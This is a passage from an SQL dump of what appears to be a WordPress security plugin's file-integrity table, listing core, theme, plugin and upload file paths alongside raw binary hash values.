�3�wg3.�4','',0,'?'),(':�.�Fδ&�W�s��n','wp-content/uploads/2016/11/kitchen-150x150.jpg',0,'��7<�\"��Jo�V�K�','��7<�\"��Jo�V�K�','�]q���#��T���\nϻ�d�w?β0��\0&�','',0,'?'),(':��s-(B���O�2��)','wp-includes/blocks/cover/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�l��ґ`�֝�K','�}\"g���D�9Z��\01���Va��l�����','',0,'?'),(':��݊� ֜�<�D��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-main-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߖ8F�CԋݰK��','`��Ǩ���eR�i� �]��s���,��i','',0,'?'),(':�3Z�VT`-[h�֗�','wp-content/themes/vega/parts/frontpage-cta-dark2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$$Js�n�h��ԦK','�Y���:k{NL�����v֭J�,Cz�','',0,'?'),(':�p����w���\'��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mB��Ve�(�i���H�','�r\0UH�Y��t0��,�T�@�f���W�!��a','',0,'?'),(':�)]|t�O�ǔo<�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/AbstractLogger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�Ug\0���_','k�l�7ن0e��,�JvSݸ�j�\\(q�Vo��','',0,'?'),(':�Xqݝ�J\\�5P�4','wp-includes/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^
�','',0,'?'),(':�ṇRM�ti#��=','wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),(';#� n����%\"���','wp-includes/Requests/Exception/HTTP/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��{�yʉ2�l','��-!V��>d�*jP�F� �;QƵ��N1aG�(','',0,'?'),(';�b�fȖ0����x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*X��A���I�m��\'','ּ�Qz�\"�(ɝ�>{\\-��9���\"{nݟOZ','',0,'?'),(';ܒscF��!����','wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�I�[���','�z>b���A�}��D`2N$��o\\�=�n','',0,'?'),(';;A^G�s�,k,Jf�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/CookieJarInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�oҁ�0@�^� 4Jb','<��~�w� m\n�8��c�ϲ&�O�<��x��0N','',0,'?'),(';1ы#�Y_N��t�','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=?��T�Y�3f��N','��N�$ �V��wN3��z��]S�5�* õ�','',0,'?'),(';D�o��~t���3*','wp-content/plugins/wordpress-seo/js/dist/languages/ca-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�t�ث@� �c�E�','1Pa���S�h�a�\"��3��x���U,���','',0,'?'),(';Rc��J���,�SA','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��E�','TH�d�����y��x?� �mP��}6�3V','',0,'?'),(';R�yh���RxK�\r','wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�T�2Aq]����4�','�bt�G�p�\0BM0z�XJv�Z�HAt�M�%','',0,'?'),(';n�Cg��7$�;��_','wp-includes/blocks/media-text/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A:d�\r���G���K�','1s���cr�G�HR�V[�s_�r��>� ','',0,'?'),(';rM�RJ]��7','wp-content/plugins/wordpress-seo/src/helpers/woocommerce-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���Q5�w3�w\\�','���(��c%�=�T�)_��lt��e ��\rW�','',0,'?'),(';��Rl��9�r5���','wp-content/languages/plugins/akismet-en_GB.mo',0,'[��>���=Q��N�','[��>���=Q��N�','*�^�M#t�¼�<�����(D1c�UC?� z�','',0,'?'),(';���4�[���`�̃','wp-content/plugins/wp-cerber/cerber-lab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>V>�J0���@�','r-$�V�B�ob�Яo��~j���\'~','',0,'?'),(';�v�0BK����1д','wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),(';�d+;�C��?��','wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�2\n���g筴{���','{����u��ǘ�g����L��n}�S��!Nϗ','',0,'?'),(';�2��yT�W�Ks���a','wp-includes/blocks/table/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S0���/�0�7����','�T�H\'~�!)��8�E� ���\nP%Zy��8��@�','',0,'?'),(';�Wct���*+��Br�','wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),(';����*1\Zn��4�','wp-includes/js/wp-emoji-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BQ��k�h�#�','�3��E��!���|r�.y�� �uN<�i�e','',0,'?'),('<a����R�]G!\'y��','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/ResponseInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�}ث4�h��C�<�y','i?��c\n�kz��w�mF>���yƄN�\'�:L','',0,'?'),('<�n~�L��M��r�','wp-content/plugins/wordpress-seo/admin/class-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�CJ�гT�]g','�@��W\Z�\n�Me�w���0��LI��zY��{�j�','',0,'?'),('<\Z\r�\Z!�����K`i','wp-content/plugins/wp-cerber/cerber-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��==!(d4���','`���H��*5U��릥��<n%��r@#\\�۶','',0,'?'),('< j����lݝ��B��(','wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C@:�p��rˬ(T*�J','\0o�=^�U�Sm���C�\0��W�4]�7','',0,'?'),('<)�2n�7�`Jw���q','wp-content/plugins/redirection/locale/json/redirection-en_NZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_P\Z�}g�x��','��\\��D�&����R�ⵀU=���c��@','',0,'?'),('<FѥY�Jw\"Of;S��','wp-includes/pomo/pomo/po.php',0,'�{K_��eG�@{ /','�{K_��eG�@{ /','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('<F���Pz�22��~','wp-includes/js/imgareaselect/imgareaselect.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(��()��3���','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('<O[.1�*m��/��$6�','wp-content/uploads/2016/11/roof-plate-397x311.jpg',0,'�Ʈ���\n��u��','�Ʈ���\n��u��','� AU��5�U�����{\0���S��T��','',0,'?'),('<_-|�@iT�����','wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7UE\Z�,�`𫞈Ó~!','�X���Y�8���kcT��W<+���F2�i','',0,'?'),('<a�ґ�z5k��n�','wp-content/plugins/redirection/redirection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�,)Q��ϵ���)Y�','��z�H=���E�k��\n�_����Uq�R�D�\ne','',0,'?'),('<y\"v�0p��+\'���','wp-content/plugins/wp-cerber/assets/flags/pw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T���k� ���e�','.�ڜ/��V���eR����x���P�i��_','',0,'?'),('<|q�|xܲ\\��zZ�{','wp-includes/blocks/page-list/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�ե�\"g9��t@','��}�=�0f��HI�Ov��9?���a�a�','',0,'?'),('<�!}K�A�,\r�y�2','wp-content/themes/twentytwentyone/template-parts/header/site-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�z*�-�9�v�Z,��','t���C�����a8f\r*���?�G�\r�G��-','',0,'?'),('<��9�u�j����!�$','wp-admin/css/install.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jA��q�\0�{�i>y�','�P5�.�Dř�/67�! d��əUV��i','',0,'?'),('<�&w5�i�B�s��','wp-content/plugins/wordpress-seo/admin/views/tabs/social/facebook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�F�kt���DƂ','�S�4=ƶ�x�PƆ�K�9��@ӑi@\"9�','',0,'?'),('<��RP���5�`','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/TooManyRedirectsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��¾,���_�Q�,�','|��\"7Z���v��S�.s��fY��|@e��','',0,'?'),('<��e�������5','wp-includes/blocks/block/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���M�� |T\'�Kvy�','U���@&?b��K��R�[,�3��m�.\ZѮb','',0,'?'),('<��$�C�DO��#��','wp-content/plugins/wp-cerber/assets/flags/fj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���yZd=�\\l���r','C�����ȶ�]�*�s������l湘Jڀ�<e','',0,'?'),('<�hj� �4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<���g��<5#��','wp-content/languages/en_GB-daeb084aab42199d26393a56c3465bc0.json',0,'����z�s8�`���Z{','����z�s8�`���Z{','oێQ�Ƴ�#!��+��J�`�>4V��-j','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@���� 4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('<�l1TmF}m��r��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fRo�l�6��\"���]','�[Z�q�U�r�jM��?O�P��r��t�&','',0,'?'),('<��L� H�1�.2��','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fr_BE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[oh��O{�1��OT','&X�ր\'��o�ڰ/ņ�w{�D߸\Z��TV#X�','',0,'?'),('<�L�@�ԧ+�2���+','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y?��y*�iE��4}Z','c�����C�Ymd��,�R��p]����rh','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('= ���Z�ë}`x|[','wp-content/plugins/wordpress-seo/src/schema-templates/preparation-time.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ؗ�gfөD3J�','��3�|����`f��(�\\A�8t���\"D�\ng','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���.��y��^J�i�*','{� ������I��^�`��\0�����<<','',0,'?'),('= ]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pm�����Q�ynRPqؙ','l�,\\��d.���\"�b�ִ�lz�w�\\�E','',0,'?'),('=;\0�7d��Kgt$�Cp','wp-content/uploads/2019/09/gardening-300x209.jpg',0,'�i�E.r��u��}d','�i�E.r��u��}d','C��̤9��l.�%��v���+a��v�BЩ�','',0,'?'),('=@�}��g\r��Zx[<�','wp-content/themes/twentytwenty/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,s+~_.K��]�0�','I���l2�S���i.k�R�3�}��8V!<�','',0,'?'),('=A��3�����Zi�-','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��sn1MQ(��f�','r����J6 Y;U���&��4=�5KQ�ia�','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�sk�����Z�j Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('=�D- ����)��>','wp-content/uploads/2019/08/Green-Energy-updraft-pre-smush-original.jpg',0,'�q��dKt�\"7Dm','�q��dKt�\"7Dm','_�ٛ��Dr�yO�M�yV�<A��q\"�sЃ','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�J:G+��cZ��T�','�A2v���-��@~9Wh���=���e~�\0l�','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IV������]��','FPy��8>��}�y�ɉ��8�w���+�TŪ','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�K�o8�E2����','�(�~�S��S\Z�[5E��!n�B�j���D ','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�k�Sz$I�7Q�','\ZQ�2N+Z�͚�L:�Cxhn�bh�*�R�__','',0,'?'),('=�)�˥���mJ\Z(*��','wp-content/themes/vega/customize/theme-defaults.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>O�8N\"�\\_�<�a','͒�HX]&�k�і�T|����:_��F��0�','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('=��)�v���:���','wp-includes/blocks/query-title/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 0o�Ԯ�<�GTw8','���ϟ?��ɐj���A�>V\rou���','',0,'?'),('>O��9<�A�)����','wp-content/themes/vega/assets/js/parallax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0Q�k�K��$Wo','�\Z�L ,A4���;�\0?��sT ����Y�','',0,'?'),('>[� g�3d�����','wp-includes/blocks/spacer/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iċ\r�뺈_j��|�t\'','.B��8���2U�����i�W�f\"o�\Z�i�O','',0,'?'),('>��Z�I�I|a��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/DroppingStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$���%^8��LaRO$','���ѓ�o��D�I��y�r,�h�~p�3�','',0,'?'),('>\'�8`�\\�ݰ��W�','wp-content/plugins/wordpress-seo/src/routes/alert-dismissal-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�5V��\0��I�C�','A?E��\r��NO$U�t?K&,�lWbԦ��','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=j�Q�\rZ��&`b$\Z6','���sd8r����$���<HI��)�P�e�','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>^��m������Z�{�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/TransferStats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�)�xH}_|x��^��','p���Ǻ�.��� )�7�\r�;��\\!��l�o�','',0,'?'),('>d�RLډDh�uJH���','wp-content/plugins/wp-cerber/assets/bn5ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڑ����@�/�@�','\0�o �~�}�2�,_*Í {J�O�4SfY��','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('>u��ʸ�!4N2��','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�;L�\'��dee��','�+G�T}�m)*��[���c5�Z�N-v>�','',0,'?'),('>v]�{rq�6x�','wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��JkԌ`�M\"�r',';Ը�P��I��@?56�t���k�N�8@�=�4','',0,'?'),('>y暈�y�m�#{��E','wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720-768x512.jpg',0,'D3�M���~O��','D3�M���~O��','�����>����k\n�9��W]����\n�:�\r��','',0,'?'),('>�l�?\'-���4��F�','wp-content/themes/vega/parts/header-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xgv�L���j@��n�^','�U,K�\0�c�`^�\\�i��үx<k�\"��5','',0,'?'),('>�o�������t�+','wp-includes/blocks/post-terms/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/��h+�~�/��C','�M�`�=���l��^\rdU4�ljRo���','',0,'?'),('>�5v�*>�ņ���3�','wp-content/uploads/2019/09/water-sustainability-300x250.jpg',0,'g��y\\�E�D!0o��','g��y\\�E�D!0o��','Q�T���?��F�l�9��c�sn�8\nz{��i','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��\Zj��֘�O��','�_��Mw�\"���G���h�pm؊�u�Ęk','',0,'?'),('>����\0�V?s�\Z��','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˡ�kI�9���H���','XikWM��0���� \n.���S7�f\0��x','',0,'?'),('>�\nq��g�/����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�X�y����gr\"3g','a�55�\Z�\\���7w{Լ^d�����TK�','',0,'?'),('>��Gf�@�Tម;�D�','wp-includes/blocks/cover/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�io�w~�DE/a{5',']}UZ\0hf�3}M�_��gio�n�K�8|V� ','',0,'?'),('>�˾Q\"<�1s1�ҹ�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ro.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�`�;���~�� �','Ԁb�*�@|C��{�f���.��w�%����\Z','',0,'?'),('>�����-8#LT�','wp-content/uploads/2016/11/White-Modern-Kitchen-768x453.jpg',0,'���f�Нb{�','���f�Нb{�','Yŭ�ɘ(���T���8�H\'V\0v�����s�','',0,'?'),('>�M~��;Oo��-�I$0','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f!��<�\r����yS�','\"-d���NN6�3�P`��ʜ`!��ڬ �q�','',0,'?'),('>�ߎ_b�ˉ1{�L','wp-content/plugins/wordfence/js/wfdashboard.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('?�WZBD�N�1�3��','wp-includes/blocks/audio/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�X՞A�}��N�D]','�bbľ���$��Nt�i��W��K��S��','',0,'?'),('?t:^3� �m\\uPq�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-hu_HU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�І2j�z�jj�\'t','�~��%f���#�*W���w���>�)h ','',0,'?'),('?���p|R�o��','wp-includes/blocks/separator/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����^N��3��\n#','R��E\'U^d��~=KA (K��/W�n\0�IN�','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�����\ZHr�','\nDfdvP�f�On:����a��г���X�','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B�� ����IN�-y','��hl�[�������(�l~�Q�u�FM� �','',0,'?'),('?U�]O-&������','wp-content/uploads/2019/10/plumbing1.jpg',0,'Qi��k��Nl���\r','Qi��k��Nl���\r','�fq \r�]f�#��3���iy�iX�/��','',0,'?'),('?X\\�mf��ڕڣ�g','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zW:\\�!O�������','\rp�����燋�r�=bm�?W�n1Q��@5�','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?`n�F�T��u`��','wp-content/uploads/2021/08/home-improvements-300x250.jpg',0,'MK���`MmN۱nhn�','MK���`MmN۱nhn�','*p\Z\Z\\w���k-�Bw�yb� ���;����W','',0,'?'),('?f�z�&,=��F���','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/link-count-indexing-modal-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��,�3���Ӕ��[','�olL%�e&æ#M��\n�$����y�f�','',0,'?'),('?���Z���8.���G','wp-content/plugins/wp-cerber/assets/flags/ec.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�* �k&�(ʬjJ�','Bd=�Zj?r/{��\Z���7MF��\'��n-Zi��','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��tƁ\Z��e\r<۶Vi*','�eX(�Ț1�_��O�:[���[di�t-� �','',0,'?'),('?���C����!��Ӳ','wp-content/themes/twentynineteen/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��*+��O}��g�','�/����h�f=@�0��5��H�0\r7t��m�8','',0,'?'),('?�4!�5ԣ�\"̘��S','wp-content/plugins/wordpress-seo/admin/class-yoast-network-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RrP>�Ζ��]��','�d\n9}�\nN�ij l�4h��G�=m\\L�1��(HQ','',0,'?'),('?�cF m��wI_��','wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��۪����i�ۭ%�.','\0���R�k�맰�J�3�i.qh�Qe;�3!��','',0,'?'),('@��A�)2��oѦ0','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-webpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�ӥ4�Fқ��','ؐy��5�\Z�%Y��,��U�9�j��X\0�5��','',0,'?'),('@D�ћS�5ʜ��3','wp-content/plugins/wordpress-seo/languages/yoast-components-cs_CZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�/,�2aC�Gg{���','.g�=S���b:���)j��I�\"4㑾�Y{','',0,'?'),('@!�a�ie�\\1}ݱ�z','wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��#ٓzt��Hۆ','�%)��t[H�>�|�빛�A�t�MҒ�n�','',0,'?'),('@\'m��4_&|�V���','wp-content/plugins/wordpress-seo/languages/wordpress-seo-en_ZA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��x\n��j�z�','���p��4tM��/O\rn�Q@��\'a���','',0,'?'),('@)�u��X�tȤ�0�','wp-content/plugins/wp-cerber/assets/flags/ng.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�mBC@�͚���','���H�!R�Ɂ=[�?aq�μYو�_hw��','',0,'?'),('@G )�7x=��A��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"����i�qo��h ?�','ڴaWtĉ����q�)N��*x�*���q;T��0','',0,'?'),('@L<��m�^��c��Ic','wp-content/plugins/wp-cerber/assets/flags/bb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��(�zc�q','7!Ky�=�]b\neO-3{/Q��ȳ�Rҳ��L','',0,'?'),('@N3�0�>�`8l��','wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�����1��','4]N�OW���\0V�қ�kҝ�v2~�_[T[N','',0,'?'),('@V�K$~`*�+c�0�','wp-includes/block-patterns/query-medium-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�=�?6CS�R�','��\"=I�P�)�o���E��\0��0r&���,','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('@h볹�3�אz2zl�','wp-includes/css/dist/edit-post/classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�6�\\o��uT�.�4�','��}��Z�R1����п�6פwow��$�P','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\n$����Ueԭ���','�mߠ���2���0}E7^�q�efm���T�','',0,'?'),('@��̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@��v\nϗ����Z�(','wp-content/plugins/wordpress-seo/admin/views/class-view-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o